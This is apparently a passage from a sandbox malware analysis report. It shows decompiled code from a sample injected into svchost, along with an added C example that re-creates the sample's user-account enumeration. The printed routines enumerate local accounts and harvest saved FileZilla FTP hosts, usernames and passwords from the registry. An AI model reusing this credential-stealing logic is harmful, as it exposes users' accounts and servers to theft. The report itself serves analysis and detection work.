                                                                                                                                         						L9:                                                          // 0x0bc015ac
                                                                                                                                         						if(_v8 != _t40) {                                            // 0x0bc015af
                                                                                                                                         							NetApiBufferFree(_v8);                                   // 0x0bc015b4: release the page before asking for the next one
                                                                                                                                         							_v8 = _t40;                                              // 0x0bc015ba
                                                                                                                                         						}                                                            // 0x0bc015ba
                                                                                                                                         					}                                                                // 0x0bc015af
                                                                                                                                         					L11:                                                             // 0x0bc015bd
                                                                                                                                         				} while (_v28 == 0xea);                                              // 0x0bc015bd: keep paging while ERROR_MORE_DATA; any other status ends the loop
                                                                                                                                         				return 1;                                                            // 0x0bc015d1: always reports success, even when NetUserEnum failed
                                                                                                                                         			}

                                                                                                                                        APIs
                                                                                                                                        • NetUserEnum.NETAPI32(00000000,00000003,00000002,?,000000FF,?,?,?), ref: 0BC01535
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000008C), ref: 0BC01583
                                                                                                                                        • NetApiBufferFree.NETAPI32(?), ref: 0BC015B4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocBufferEnumFreeLocalUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2257117481-0
                                                                                                                                        • Opcode ID: 47e0f255a263482f2ff9512c2089df5c53801e8851eb627a4b9f80c1f0d4e555
                                                                                                                                        • Instruction ID: 2327e2b250b84b2f6b29fa62c6d4a315706a7d855bfc6352afa785814ee55c91
                                                                                                                                        • Opcode Fuzzy Hash: 47e0f255a263482f2ff9512c2089df5c53801e8851eb627a4b9f80c1f0d4e555
                                                                                                                                        • Instruction Fuzzy Hash: 55214F75D20204AFDB11DF99C885AAEFBF8FB84320F644656E565F7290DA709B40CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.37%
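
                                                                                                                                         The loop in E0BC01507 steps 0x74 bytes per entry and reads the fields at offsets 0x00 and 0x68, which on 32-bit Windows are usri3_name and usri3_profile of USER_INFO_3; it pages with the resume handle for as long as NetUserEnum returns ERROR_MORE_DATA (0xea). The C program below is an added example written for this page, not code from the sample or from the Joe Sandbox report. It declares the x86 USER_INFO_3 layout so the listing's constants can be confirmed with sizeof/offsetof on any host, and re-implements the walk over a constructed buffer. The account names, the string table that stands in for the 32-bit address space, and the narrowing helper are assumptions made for the example; the body of E0BC09BE0 is not on this page and is only assumed to copy or convert a NUL-terminated wide string.

```c
/* Added example, not the sample's code nor part of the Joe Sandbox report. It
 * declares the x86 USER_INFO_3 layout E0BC01507 walks (to check the listing's
 * 0x74/0x00/0x68 constants) and re-runs the loop over a constructed buffer. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint32_t X86PTR;  /* LPWSTR / PBYTE on 32-bit Windows */
typedef struct {          /* USER_INFO_3 (lmaccess.h), x86, declaration order */
    X86PTR   usri3_name, usri3_password;                                   /* 0x00 0x04 */
    uint32_t usri3_password_age, usri3_priv;                               /* 0x08 0x0c */
    X86PTR   usri3_home_dir, usri3_comment;                                /* 0x10 0x14 */
    uint32_t usri3_flags;                                                  /* 0x18 */
    X86PTR   usri3_script_path;                                            /* 0x1c */
    uint32_t usri3_auth_flags;                                             /* 0x20 */
    X86PTR   usri3_full_name, usri3_usr_comment, usri3_parms, usri3_workstations; /* 0x24..0x30 */
    uint32_t usri3_last_logon, usri3_last_logoff, usri3_acct_expires;      /* 0x34..0x3c */
    uint32_t usri3_max_storage, usri3_units_per_week;                      /* 0x40 0x44 */
    X86PTR   usri3_logon_hours;                                            /* 0x48 */
    uint32_t usri3_bad_pw_count, usri3_num_logons;                         /* 0x4c 0x50 */
    X86PTR   usri3_logon_server;                                           /* 0x54 */
    uint32_t usri3_country_code, usri3_code_page, usri3_user_id, usri3_primary_group_id; /* 0x58..0x64 */
    X86PTR   usri3_profile, usri3_home_dir_drive;                          /* 0x68 0x6c */
    uint32_t usri3_password_expired;                                       /* 0x70 */
} USER_INFO_3_X86;                                                         /* sizeof 0x74 */

#define LISTING_STRIDE      0x74  /* _t42 = _t42 + 0x74 */
#define LISTING_NAME_OFF    0x00  /* *_t42 */
#define LISTING_PROFILE_OFF 0x68  /* *(_t42 + 0x68) */

/* 1 when the listing's constants are exactly the x86 USER_INFO_3 layout. */
int layout_matches_listing(void) {
    return sizeof(USER_INFO_3_X86) == LISTING_STRIDE
        && offsetof(USER_INFO_3_X86, usri3_name) == LISTING_NAME_OFF
        && offsetof(USER_INFO_3_X86, usri3_profile) == LISTING_PROFILE_OFF;
}
typedef struct { char name[64]; char profile[64]; } HarvestedAccount;

/* ASCII-only UTF-16LE narrowing; stands in for E0BC09BE0 (assumed behaviour). */
static void narrow_utf16le(const uint8_t *w, char *out, size_t cap) {
    size_t i = 0;
    while (i + 1 < cap && (w[2 * i] | w[2 * i + 1])) { out[i] = (char)w[2 * i]; i++; }
    out[i] = '\0';
}

/* Same walk as E0BC01507: LISTING_STRIDE bytes per entry, read usri3_name and
 * usri3_profile, keep the entry only when the name converted. `strtab` stands
 * in for the x86 address space that the pointer fields point into. */
size_t harvest_accounts(const uint8_t *buf, uint32_t entries_read,
                        const uint8_t *strtab, HarvestedAccount *out, size_t cap) {
    size_t n = 0;
    for (uint32_t i = 0; i < entries_read && n < cap; i++) {
        const uint8_t *e = buf + (size_t)i * LISTING_STRIDE;
        uint32_t name_ref, profile_ref;
        memcpy(&name_ref, e + LISTING_NAME_OFF, sizeof name_ref);
        memcpy(&profile_ref, e + LISTING_PROFILE_OFF, sizeof profile_ref);
        if (name_ref == 0) continue;                          /* if (_t41 != 0) */
        narrow_utf16le(strtab + name_ref, out[n].name, sizeof out[n].name);
        out[n].profile[0] = '\0';
        if (profile_ref != 0)
            narrow_utf16le(strtab + profile_ref, out[n].profile, sizeof out[n].profile);
        n++;
    }
    return n;
}

/* Constructed data, not captured from the sample; offset 0 stays unused so a 0 "pointer" is NULL. */
static uint8_t g_strtab[256], g_buf[3 * LISTING_STRIDE];
static HarvestedAccount g_demo[8];
static size_t g_demo_n;

static uint32_t put_wstr(uint32_t *pos, const char *s) {   /* returns the x86 "pointer" */
    uint32_t start = *pos;
    for (; *s; s++) { g_strtab[(*pos)++] = (uint8_t)*s; g_strtab[(*pos)++] = 0; }
    g_strtab[(*pos)++] = 0; g_strtab[(*pos)++] = 0;
    return start;
}
static void put_entry(size_t idx, uint32_t name_ref, uint32_t profile_ref) {
    uint8_t *e = g_buf + idx * LISTING_STRIDE; memset(e, 0, LISTING_STRIDE);
    memcpy(e + LISTING_NAME_OFF, &name_ref, sizeof name_ref);
    memcpy(e + LISTING_PROFILE_OFF, &profile_ref, sizeof profile_ref);
}

/* Builds three entries, runs the walk, returns how many were kept (expect 2). */
size_t demo_harvest(void) {
    uint32_t pos = 2;
    uint32_t admin = put_wstr(&pos, "Administrator");
    uint32_t svc   = put_wstr(&pos, "svc_backup");
    uint32_t prof  = put_wstr(&pos, "\\\\srv\\profiles\\svc");
    put_entry(0, admin, 0);
    put_entry(1, 0, 0);     /* name conversion "failed": the sample drops it */
    put_entry(2, svc, prof);
    return g_demo_n = harvest_accounts(g_buf, 3, g_strtab, g_demo, 8);
}
const char *demo_name(size_t i)    { return i < g_demo_n ? g_demo[i].name : ""; }
const char *demo_profile(size_t i) { return i < g_demo_n ? g_demo[i].profile : ""; }

int main(void) {
    printf("layout matches listing: %d\n", layout_matches_listing());
    for (size_t i = 0, n = demo_harvest(); i < n; i++)
        printf("%s profile=\"%s\"\n", demo_name(i), demo_profile(i));
    return 0;
}
```

                                                                                                                                         Build with cc -std=c99 and run; the printed rows are the (name, profile) pairs the sample would have linked into its list at 0xbc10d08. The same three facts are enough to recognise this routine in other dumps of the family: NetUserEnum with level 3 and filter 2 (FILTER_NORMAL_ACCOUNT), a 0x74-byte entry stride, and a 0x8c-byte LocalAlloc(LPTR) node whose first three dwords are next, name and profile.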

                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E0BC0341E(signed int* _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                        				signed int _v24;
                                                                                                                                        				intOrPtr _v40;
                                                                                                                                        				intOrPtr _v44;
                                                                                                                                        				signed int _v48;
                                                                                                                                        				signed int _v52;
                                                                                                                                        				signed int _v56;
                                                                                                                                        				void* _v60;
                                                                                                                                        				signed int _v64;
                                                                                                                                        				intOrPtr _v68;
                                                                                                                                        				char _v72;
                                                                                                                                        				intOrPtr _v76;
                                                                                                                                        				intOrPtr _v80;
                                                                                                                                        				char _v84;
                                                                                                                                        				intOrPtr* _v88;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t103;
                                                                                                                                        				signed int _t104;
                                                                                                                                        				signed char _t106;
                                                                                                                                        				signed int _t109;
                                                                                                                                        				signed int _t110;
                                                                                                                                        				unsigned int _t125;
                                                                                                                                        				signed int _t128;
                                                                                                                                        				void* _t131;
                                                                                                                                        				intOrPtr* _t133;
                                                                                                                                        				intOrPtr* _t137;
                                                                                                                                        				intOrPtr _t138;
                                                                                                                                        				signed int _t140;
                                                                                                                                        				signed int _t142;
                                                                                                                                        				signed int _t150;
                                                                                                                                        				signed short _t152;
                                                                                                                                        				signed int _t153;
                                                                                                                                        				signed int _t154;
                                                                                                                                        				signed int _t157;
                                                                                                                                        				intOrPtr _t159;
                                                                                                                                        				signed int _t165;
                                                                                                                                        				signed int _t168;
                                                                                                                                        				void* _t171;
                                                                                                                                        				signed int* _t174;
                                                                                                                                        				void* _t177;
                                                                                                                                        				unsigned int _t179;
				signed int _t203;
				unsigned int _t206;
				intOrPtr _t207;
				void* _t210;
				signed int _t215;
				void* _t217;
				void* _t218;
				void* _t219;
				intOrPtr _t221;
				signed int _t222;
				signed int* _t223;
				signed int _t225;
				void* _t227;
				void* _t228;

				_t227 = (_t225 & 0xfffffff8) - 0x2c;
				_t221 = _a12;
				_t215 = 0;
				if(_t221 != 0) {
					_t103 =  *0xbc10d0c; // 0x800
					_t174 = _a4;
					_t222 = _t221 - 1;
					_t104 = _t103 * _t222;
					_v24 = _t104;
					 *((intOrPtr*)( *_t174 + 0x14))(_t174, _t104, 0, 0, 0);
					__eflags = _t222;
					if(_t222 == 0) {
						_t171 = 0x64;
						__eflags = 0;
						 *((intOrPtr*)( *_t174 + 0x14))(_t174, _t171, 0, 1, 0);
					}
					_t223 = _a16;
					_t106 = E0BC08BBA(_t223, _t174);
					_pop(_t177);
					_v52 = _t106 & 0x000000ff;
					__eflags =  *_t223 - _t215;
					if(__eflags == 0) {
						L9:
						_v48 = _t215;
						goto L10;
					} else {
						_push( &_v64);
						_t219 = 2;
						_t165 = E0BC08A0D(_t174, _t177, _t219, __eflags);
						_pop(_t177);
						 *_t223 = _t165;
						__eflags = _t165;
						if(__eflags == 0) {
							L8:
							_t215 = 0;
							__eflags = 0;
							goto L9;
						}
						_t168 = E0BC08A0D(_t174, _t177, _t219, __eflags,  &_v64);
						_pop(_t177);
						 *_t223 = _t168;
						__eflags = _t168;
						if(_t168 == 0) {
							goto L8;
						}
						asm("rol ax, 0x8");
						_v48 = _v64 & 0x0000ffff;
						_t215 = 0;
						L10:
						__eflags =  *_t223 - _t215;
						if(__eflags != 0) {
							_push( &_v64);
							_t218 = 2;
							 *_t223 = E0BC08A0D(_t174, _t177, _t218, __eflags);
							_t215 = 0;
							__eflags = 0;
						}
						E0BC08BBA(_t223, _t174);
						__eflags =  *_t223 - _t215;
						if( *_t223 == _t215) {
							L27:
							_t109 = 0;
							__eflags = 0;
							L28:
							return _t109;
						} else {
							__eflags = _v52 - 0xd;
							if(_v52 == 0xd) {
								L15:
								_t110 = _v48 & 0x0000ffff;
								_t179 =  *0xbc10d0c; // 0x800
								_t180 = _t179 >> 1;
								_v56 = _t110;
								__eflags = _t110 - _t179 >> 1;
								if(_t110 > _t179 >> 1) {
									goto L27;
								}
								__eflags = _v52 - 5;
								if(_v52 == 5) {
									_t159 = E0BC08B76(_t223, _t174);
									_pop(_t180);
									_v40 = _t159;
								}
								_v60 = LocalAlloc(0x40, 0x10080);
								_v48 = _t215;
								__eflags = _v56 - _t215;
								if(_v56 <= _t215) {
									L25:
									__eflags =  *_t223 - _t215;
									if( *_t223 != _t215) {
										__eflags = _v52 - 5;
										if(_v52 != 5) {
											__eflags = _v52 - 0xd;
											if(_v52 != 0xd) {
												L51:
												E0BC08D3D(_v60); // executed
												goto L1;
											}
											_v52 = _t215;
											__eflags = _v56 - _t215;
											if(_v56 <= _t215) {
												goto L51;
											} else {
												goto L38;
											}
											while(1) {
												L38:
												_t203 =  *_t174;
												 *((intOrPtr*)(_t203 + 0x14))(_t174,  *((intOrPtr*)(_v60 + _v52 * 4)) + _v44, 0, _t215, _t215);
												_v52 = E0BC02F2F(_t223, _t174, _t215);
												__eflags =  *_t223 - _t215;
												if( *_t223 == _t215) {
													goto L26;
												}
												__eflags = _t203;
												if(_t203 != 0) {
													goto L51;
												}
												E0BC02F2F(_t223, _t174, _t215);
												__eflags =  *_t223 - _t215;
												if( *_t223 == _t215) {
													goto L26;
												}
												_t125 =  *0xbc10d0c; // 0x800
												_t128 = (_t125 + 0xfffffff4 << 5) / 0xff;
												_t206 =  *0xbc10d0c; // 0x800
												_t207 = _t206 + 0xffffffdd;
												_v68 = _t207;
												_t69 = _t128 - 0x17; // 0x6f5
												_t190 = _t69;
												_t129 = _v52;
												_v60 = _t190;
												__eflags = _t129 - _t207;
												if(_t129 > _t207) {
													_t140 = _t129 - _t190;
													_t72 = _t207 + 0x1f; // 0x742
													_t190 = _t72;
													_t129 = _v60;
													_t210 = _v60 + _t140 % _t72;
													__eflags = _v68 - _t210;
													if(_v68 >= _t210) {
														_t129 = _t210;
													}
												}
												_t131 = E0BC02FB8(_t223, _t190, _t174, _t129, _v52);
												_t228 = _t227 + 0xc;
												_v60 = _t131;
												__eflags = _t131 - _t215;
												if(_t131 == _t215) {
													goto L26;
												} else {
													_v68 = E0BC03294( &_v84, _t131,  &_v84,  &_v56);
													_t133 = _v60;
													_t227 = _t228 + 0xc;
													 *((intOrPtr*)( *_t133 + 8))(_t133);
													__eflags = _v72 - _t215;
													if(_v72 == _t215) {
														L50:
														_v76 = _v76 + 1;
														__eflags = _v76 - _v80;
														if(_v76 < _v80) {
															continue;
														}
														goto L51;
													}
													__eflags = _v88 - _t215;
													if(_v88 == _t215) {
														goto L50;
													}
													_a24(_t174, _a8, _v88, _v60, _a20);
													_t137 = _v88;
													_t227 = _t227 + 0x14;
													_v72 = _t137;
													while(1) {
														_t138 =  *_t137;
														__eflags = _t138 - _t215;
														if(_t138 == _t215) {
															goto L50;
														}
														E0BC08D3D(_t138);
														_t95 =  &_v72;
														 *_t95 = _v72 + 4;
														__eflags =  *_t95;
														_t137 = _v72;
													}
													goto L50;
												}
											}
											goto L26;
										}
										_v52 = _t215;
										__eflags = _v56 - _t215;
										if(_v56 <= _t215) {
											L34:
											_t142 = E0BC0341E(_t174, _a8, _v40, _t223, _a20, _a24); // executed
											__eflags = _t142;
											if(_t142 != 0) {
												goto L51;
											}
											goto L26;
										} else {
											goto L31;
										}
										while(1) {
											L31:
											 *((intOrPtr*)( *_t174 + 0x14))(_t174,  *((intOrPtr*)(_v60 + _v52 * 4)) + _v44, 0, _t215, _t215);
                                                                                                                                        											_v68 = E0BC08B76(_t223, _t174);
                                                                                                                                        											E0BC02F2F(_t223, _t174, _t215);
                                                                                                                                        											__eflags =  *_t223 - _t215;
                                                                                                                                        											if( *_t223 == _t215) {
                                                                                                                                        												goto L26;
                                                                                                                                        											}
                                                                                                                                        											_t150 = E0BC0341E(_t174, _a8, _v68, _t223, _a20, _a24); // executed
                                                                                                                                        											_t227 = _t227 + 0x18;
                                                                                                                                        											__eflags = _t150;
                                                                                                                                        											if(_t150 == 0) {
                                                                                                                                        												goto L26;
                                                                                                                                        											}
                                                                                                                                        											_v72 = _v72 + 1;
                                                                                                                                        											__eflags = _v72 - _v76;
                                                                                                                                        											if(_v72 < _v76) {
                                                                                                                                        												continue;
                                                                                                                                        											}
                                                                                                                                        											goto L34;
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        									L26:
                                                                                                                                        									E0BC08D3D(_v80);
                                                                                                                                        									goto L27;
                                                                                                                                        								} else {
                                                                                                                                        									do {
                                                                                                                                        										__eflags =  *_t223 - _t215;
                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                        											L23:
                                                                                                                                        											_t152 = 0;
                                                                                                                                        											__eflags = 0;
                                                                                                                                        											goto L24;
                                                                                                                                        										}
                                                                                                                                        										_push( &_v64);
                                                                                                                                        										_t217 = 2;
                                                                                                                                        										_t157 = E0BC08A0D(_t174, _t180, _t217, __eflags);
                                                                                                                                        										 *_t223 = _t157;
                                                                                                                                        										__eflags = _t157;
                                                                                                                                        										if(_t157 == 0) {
                                                                                                                                        											_t215 = 0;
                                                                                                                                        											__eflags = 0;
                                                                                                                                        											goto L23;
                                                                                                                                        										}
                                                                                                                                        										asm("rol ax, 0x8");
                                                                                                                                        										_t152 = _v64 & 0x0000ffff;
                                                                                                                                        										_t215 = 0;
                                                                                                                                        										L24:
                                                                                                                                        										_t180 = _t152 & 0x0000ffff;
                                                                                                                                        										_t153 = _v48;
                                                                                                                                        										 *(_v60 + _t153 * 4) = _t152 & 0x0000ffff;
                                                                                                                                        										_t154 = _t153 + 1;
                                                                                                                                        										_v48 = _t154;
                                                                                                                                        										__eflags = _t154 - _v56;
                                                                                                                                        									} while (_t154 < _v56);
                                                                                                                                        									goto L25;
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        							__eflags = _v52 - 5;
                                                                                                                                        							if(_v52 != 5) {
                                                                                                                                        								goto L27;
                                                                                                                                        							}
                                                                                                                                        							goto L15;
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				L1:
                                                                                                                                        				_t109 = 1;
                                                                                                                                        				goto L28;
                                                                                                                                        			}
                                                                                                                                        0x0bc036ef
                                                                                                                                        0x0bc036f4
                                                                                                                                        0x0bc036f7
                                                                                                                                        0x0bc036fb
                                                                                                                                        0x0bc036fd
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03703
                                                                                                                                        0x0bc03713
                                                                                                                                        0x0bc03717
                                                                                                                                        0x0bc0371d
                                                                                                                                        0x0bc03721
                                                                                                                                        0x0bc03724
                                                                                                                                        0x0bc03728
                                                                                                                                        0x0bc03765
                                                                                                                                        0x0bc03765
                                                                                                                                        0x0bc0376d
                                                                                                                                        0x0bc03771
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03771
                                                                                                                                        0x0bc0372a
                                                                                                                                        0x0bc0372e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0373f
                                                                                                                                        0x0bc03742
                                                                                                                                        0x0bc03746
                                                                                                                                        0x0bc03749
                                                                                                                                        0x0bc0375f
                                                                                                                                        0x0bc0375f
                                                                                                                                        0x0bc03761
                                                                                                                                        0x0bc03763
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03750
                                                                                                                                        0x0bc03755
                                                                                                                                        0x0bc03755
                                                                                                                                        0x0bc03755
                                                                                                                                        0x0bc0375a
                                                                                                                                        0x0bc0375e
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0375f
                                                                                                                                        0x0bc036fd
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0364e
                                                                                                                                        0x0bc035a9
                                                                                                                                        0x0bc035ad
                                                                                                                                        0x0bc035b1
                                                                                                                                        0x0bc03611
                                                                                                                                        0x0bc03620
                                                                                                                                        0x0bc03628
                                                                                                                                        0x0bc0362a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc035b3
                                                                                                                                        0x0bc035b3
                                                                                                                                        0x0bc035cb
                                                                                                                                        0x0bc035d5
                                                                                                                                        0x0bc035dd
                                                                                                                                        0x0bc035e4
                                                                                                                                        0x0bc035e6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc035f7
                                                                                                                                        0x0bc035fc
                                                                                                                                        0x0bc035ff
                                                                                                                                        0x0bc03601
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03603
                                                                                                                                        0x0bc0360b
                                                                                                                                        0x0bc0360f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0360f
                                                                                                                                        0x0bc035b3
                                                                                                                                        0x0bc0358b
                                                                                                                                        0x0bc0358f
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03540
                                                                                                                                        0x0bc03540
                                                                                                                                        0x0bc03540
                                                                                                                                        0x0bc03542
                                                                                                                                        0x0bc0356c
                                                                                                                                        0x0bc0356c
                                                                                                                                        0x0bc0356c
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0356c
                                                                                                                                        0x0bc03548
                                                                                                                                        0x0bc0354b
                                                                                                                                        0x0bc0354e
                                                                                                                                        0x0bc03554
                                                                                                                                        0x0bc03556
                                                                                                                                        0x0bc03558
                                                                                                                                        0x0bc0356a
                                                                                                                                        0x0bc0356a
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0356a
                                                                                                                                        0x0bc0355f
                                                                                                                                        0x0bc03563
                                                                                                                                        0x0bc03566
                                                                                                                                        0x0bc0356e
                                                                                                                                        0x0bc03572
                                                                                                                                        0x0bc03575
                                                                                                                                        0x0bc03579
                                                                                                                                        0x0bc0357c
                                                                                                                                        0x0bc0357d
                                                                                                                                        0x0bc03581
                                                                                                                                        0x0bc03581
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03540
                                                                                                                                        0x0bc0353e
                                                                                                                                        0x0bc034ef
                                                                                                                                        0x0bc034f4
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc034f4
                                                                                                                                        0x0bc034e2
                                                                                                                                        0x0bc0347c
                                                                                                                                        0x0bc03433
                                                                                                                                        0x0bc03435
                                                                                                                                        0x00000000

APIs
• LocalAlloc.KERNEL32(00000040,00010080), ref: 0BC0352C
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: AllocLocal
• String ID:
• API String ID: 3494564517-0
• Opcode ID: 4be3c8129afaf623c42ebd7ccbd19f1a4d54bae3a7edc2e19b13a45f7a79b48f
• Instruction ID: 5c5d46b2e8aaa4be49d732247d359f996236395be9753634c05ef2bd8d8701cb
• Opcode Fuzzy Hash: 4be3c8129afaf623c42ebd7ccbd19f1a4d54bae3a7edc2e19b13a45f7a79b48f
• Instruction Fuzzy Hash: 97B17CB15283819FC715DF69C84582BBBE9FBCC610F104A2EF895D6290EB30DA85CB56
Uniqueness

Uniqueness Score: 0.05%

Control-flow Graph

C-Code - Quality: 37%
E0BC023A1(void* __ecx, void* __edx, intOrPtr _a4, char* _a8) {
    signed int _v8;
    char _v2056;
    intOrPtr _v2060;
    void* _v2064;
    char _v2068;
    intOrPtr _v2072;
    intOrPtr _v2076;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t24;
    long _t34;
    char* _t46;
    void* _t51;
    signed int _t54;
    void* _t55;
    void* _t57;

    _t51 = __edx;
    _t24 =  *0xbc10000; // 0xbb40e64e
    _v8 = _t24 ^ _t54;
    _t46 = _a8;
    _t52 = 0xbeef0013;
    _v2072 = _a4;
    _v2060 = 0;
    E0BC0254B(_t46, __ecx, _a4, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed
    E0BC0254B(_t46, __ecx, _v2072, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013); // executed
    E0BC0254B(_t46, __ecx, _v2072, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014); // executed
    _t57 = _t55 + 0x60;
    _t34 = RegOpenKeyA(0x80000001, _t46,  &_v2064); // executed
    if(_t34 == 0) {
        _t52 = RegEnumKeyExA;
        _push(0);
        _push(0);
        _push(0);
        _push(0);
        _push( &_v2068);
        _push( &_v2056);
        _push(0);
        while(1) {
            _v2068 = 0x7ff;
            if(RegEnumKeyExA(_v2064, ??, ??, ??, ??, ??, ??, ??) != 0) {
                break;
            }
            _v2076 = E0BC08F32(E0BC08EE2("\\", _t46),  &_v2056);
            E0BC023A1( &_v2056, _t51, _v2072, _t41);
            E0BC08D3D(_v2076);
            _t57 = _t57 + 0x18;
            _v2060 = _v2060 + 1;
            _push(0);
            _push(0);
            _push(0);
            _push(0);
            _push( &_v2068);
            _push( &_v2056);
            _push(_v2060);
        }
        _t34 = RegCloseKey(_v2064);
                                                                                                                                        				}
                                                                                                                                        				return E0BC09FDC(_t34, _t46, _v8 ^ _t54, _t51, _t52, 0);
                                                                                                                                        			}
                                                                                                                                        0x0bc023a1
                                                                                                                                        0x0bc023aa
                                                                                                                                        0x0bc023b1
                                                                                                                                        0x0bc023b8
                                                                                                                                        0x0bc023bd
                                                                                                                                        0x0bc023e1
                                                                                                                                        0x0bc023ec
                                                                                                                                        0x0bc023f2
                                                                                                                                        0x0bc0241e
                                                                                                                                        0x0bc02451
                                                                                                                                        0x0bc02456
                                                                                                                                        0x0bc02466
                                                                                                                                        0x0bc0246e
                                                                                                                                        0x0bc02474
                                                                                                                                        0x0bc0247a
                                                                                                                                        0x0bc0247b
                                                                                                                                        0x0bc0247c
                                                                                                                                        0x0bc0247d
                                                                                                                                        0x0bc02484
                                                                                                                                        0x0bc0248b
                                                                                                                                        0x0bc0248c
                                                                                                                                        0x0bc024e5
                                                                                                                                        0x0bc024eb
                                                                                                                                        0x0bc024f9
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc024ae
                                                                                                                                        0x0bc024b4
                                                                                                                                        0x0bc024bf
                                                                                                                                        0x0bc024c4
                                                                                                                                        0x0bc024c7
                                                                                                                                        0x0bc024cd
                                                                                                                                        0x0bc024ce
                                                                                                                                        0x0bc024cf
                                                                                                                                        0x0bc024d0
                                                                                                                                        0x0bc024d7
                                                                                                                                        0x0bc024de
                                                                                                                                        0x0bc024df
                                                                                                                                        0x0bc024df
                                                                                                                                        0x0bc02501
                                                                                                                                        0x0bc02501
                                                                                                                                        0x0bc02515

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0BC02466
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC024F5
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC02501
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$Software\FileZilla$User
                                                                                                                                        • API String ID: 1332880857-2750396267
                                                                                                                                        • Opcode ID: 6e82eef031ab727920e6c89faff818f1ac65400b375b374f6fa9e17d18383350
                                                                                                                                        • Instruction ID: 359ea5f23a02120bb8691b66cbeb2fc00e870cf4ae09b301c8a4e3e60d365098
                                                                                                                                        • Opcode Fuzzy Hash: 6e82eef031ab727920e6c89faff818f1ac65400b375b374f6fa9e17d18383350
                                                                                                                                        • Instruction Fuzzy Hash: 62317875A75218BADB109F998C46EDBBAFCFF04704F00C1B4B94AA2180DD709A849FF0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
